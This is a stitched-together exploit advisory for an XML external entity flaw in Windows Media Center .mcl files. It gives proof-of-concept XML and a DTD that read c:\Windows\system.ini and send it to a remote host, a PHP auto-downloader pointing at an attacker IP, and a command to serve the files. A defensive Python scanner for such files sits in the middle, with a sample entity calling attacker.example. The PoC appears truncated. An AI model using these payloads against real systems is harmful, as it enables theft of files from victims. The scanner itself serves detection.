Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass Vulnerability

Reporter hyp3rlinx
Modified 2019-12-03T00:00:00


# Exploit Title: Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
# Discovery by: hyp3rlinx
# Date: 2019-12-03
[+] Credits: John Page (aka hyp3rlinx)
[+] ISR: Apparition Security


Microsoft Windows Media Center

Windows Media Center is a discontinued digital video recorder and media player created by Microsoft.
Media Center was first introduced to Windows in 2002 with Windows XP Media Center Edition.

[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)

[Security Issue]
This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed.
Now, to make matters worse, I will let you know that "mark-of-the-web" (MotW) does not matter here; it is simply ignored.
Meaning, if the .MCL file is downloaded from the internet it gets the MotW, but files are still exfiltrated.

Therefore, I am releasing this "anniversary edition" XXE with the important MotW information.

This is a fully working remote information disclosure vulnerability that still affects Windows 7.
Windows 7 is near end of life this January, yet it is still used by many organizations.
Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center but I have not tested it.

Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server Port 80 etc...
Download the ".mcl" file using Microsoft Internet Explorer.

Check the MotW in the directory where you downloaded the .mcl file (dir /r lists alternate data streams) and note that the Zone.Identifier:$DATA stream exists.
Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol.

OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro
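Since the MotW is not a mitigation here, defenders have to find the dangerous .mcl files themselves. The following scanner is an added example (not the advisory author's code) that flags .mcl/XML files whose DOCTYPE declares external entities (SYSTEM/PUBLIC), entity values that declare further entities (the shape of an exfiltration DTD), parameter-entity references inside the DTD, and externally loaded DTDs; it also reads the Zone.Identifier stream when run on NTFS so the verdict can record whether the file arrived from the internet. The sample document and the host name attacker.example in it are constructed placeholders.

```python
"""Static scanner for Windows Media Center .mcl files (plain XML) that flags
DOCTYPE constructs used for XXE. Added defender example; not the advisory's code."""
import re
import sys
from dataclasses import dataclass
from pathlib import Path
from typing import Optional

# Internal subset of a DOCTYPE: "<!DOCTYPE name [ ... ]>". A file cut off
# before the closing "]>" is still matched up to end of input.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\s+[^\[>]*\[(.*?)(?:\]\s*>|\Z)", re.S | re.I)
# DOCTYPE whose whole DTD is loaded from an external URI.
EXTERNAL_DTD_RE = re.compile(r"<!DOCTYPE\s+[\w.\-]+\s+(?:SYSTEM|PUBLIC)\s", re.I)
# One entity declaration: "%" marks a parameter entity, SYSTEM/PUBLIC an external one.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%)?\s*(?P<name>[\w.\-]+)\s+"
    r"(?:(?P<kind>SYSTEM|PUBLIC)\s+(?:(?P<pubid>\"[^\"]*\"|'[^']*')\s+)?(?P<uri>\"[^\"]*\"|'[^']*')"
    r"|(?P<literal>\"[^\"]*\"|'[^']*'))",
    re.S | re.I,
)
# "%name;" references, which expand parameter entities inside the DTD itself.
PARAM_REF_RE = re.compile(r"%([\w.\-]+);")


@dataclass
class Finding:
    category: str
    entity: str
    detail: str


def classify_uri(uri: str) -> str:
    """Bucket an entity URI: fetched over the network, read from the local disk, or relative."""
    u = uri.strip().lower()
    if re.match(r"^(https?|ftp)://", u):
        return "remote"
    if u.startswith("file:") or re.match(r"^[a-z]:[\\/]", u) or u.startswith(("\\\\", "/")):
        return "local-file"
    return "relative"  # resolved against the document's own location


def scan_text(xml_text: str) -> dict:
    """Return {'verdict': 'clean' | 'suspicious', 'findings': [Finding, ...]}."""
    findings = []
    if EXTERNAL_DTD_RE.search(xml_text):
        findings.append(Finding("external-dtd", "DOCTYPE", "DTD loaded from an external URI"))
    m = DOCTYPE_RE.search(xml_text)
    subset = m.group(1) if m else ""
    for e in ENTITY_RE.finditer(subset):
        name = ("%" if e.group("param") else "") + e.group("name")
        if e.group("kind"):  # external entity: replacement text comes from a URI
            uri = e.group("uri")[1:-1]
            findings.append(Finding(f"{classify_uri(uri)}-external-entity", name,
                                    f"{e.group('kind').upper()} {uri}"))
        elif "<!ENTITY" in e.group("literal").upper():  # entity value declares another entity
            findings.append(Finding("nested-entity-declaration", name,
                                    "entity value itself declares an entity"))
    refs = PARAM_REF_RE.findall(subset)
    if refs:
        findings.append(Finding("parameter-entity-reference", ",".join(refs),
                                "parameter entities expanded inside the DTD"))
    bad = ("external-dtd", "nested-entity-declaration")
    suspicious = any(f.category in bad or f.category.endswith("external-entity") for f in findings)
    return {"verdict": "suspicious" if suspicious else "clean", "findings": findings}


def zone_identifier(path: Path) -> Optional[str]:
    """Read the NTFS Zone.Identifier stream (the MotW) if present; None elsewhere."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def scan_file(path: Path) -> dict:
    """Scan a file on disk and record its MotW. Media Center opens the file either
    way, so a present MotW documents internet origin rather than blocking anything."""
    result = scan_text(path.read_text(encoding="utf-8", errors="replace"))
    result["motw"] = zone_identifier(path)
    return result


# Constructed sample mirroring the advisory's DOCTYPE layout (placeholder host).
SUSPICIOUS_MCL = r"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE application [
<!ENTITY % localfile SYSTEM "c:\Windows\system.ini">
<!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
%remote;
]>
<application title="demo"/>
"""
# Constructed benign launcher with no DOCTYPE at all.
BENIGN_MCL = '<?xml version="1.0"?>\n<application title="Demo" url="http://localhost/player"/>\n'

if __name__ == "__main__":
    for arg in sys.argv[1:]:
        r = scan_file(Path(arg))
        print(arg, r["verdict"], "MotW present" if r["motw"] else "no MotW")
        for f in r["findings"]:
            print("   ", f.category, f.entity, f.detail)
    if not sys.argv[1:]:
        print("constructed sample:", scan_text(SUSPICIOUS_MCL)["verdict"])
```

Run it as `python scan_mcl.py <file.mcl ...>` on a download directory; any .mcl whose DOCTYPE carries an external or nested entity deserves quarantine regardless of what the Zone.Identifier says. The regexes are deliberately lenient about whitespace and truncation so that a file that an XML parser would reject as malformed is still reported rather than silently skipped.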

1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"

# PoC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE knobgobslob [
<!ENTITY % data666 SYSTEM "c:\Windows\system.ini">
<!ENTITY % junk SYSTEM "http://<TARGET-IP>/FindMeThatBiotch.dtd">

2) "FindMeThatBiotch.dtd"
<!ENTITY % param666 "<!ENTITY % FindMeThatBiotch SYSTEM 'http://<TARGET-IP>/%data666;'>">

3) Auto exploit PHP .mcl file downloader.

$url = 'http://<ATTACKER-IP>/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary"); 
header("Content-disposition: attachment; filename=\"" . basename($url) . "\""); 

4) python -m SimpleHTTPServer 80

# [2019-12-04]  #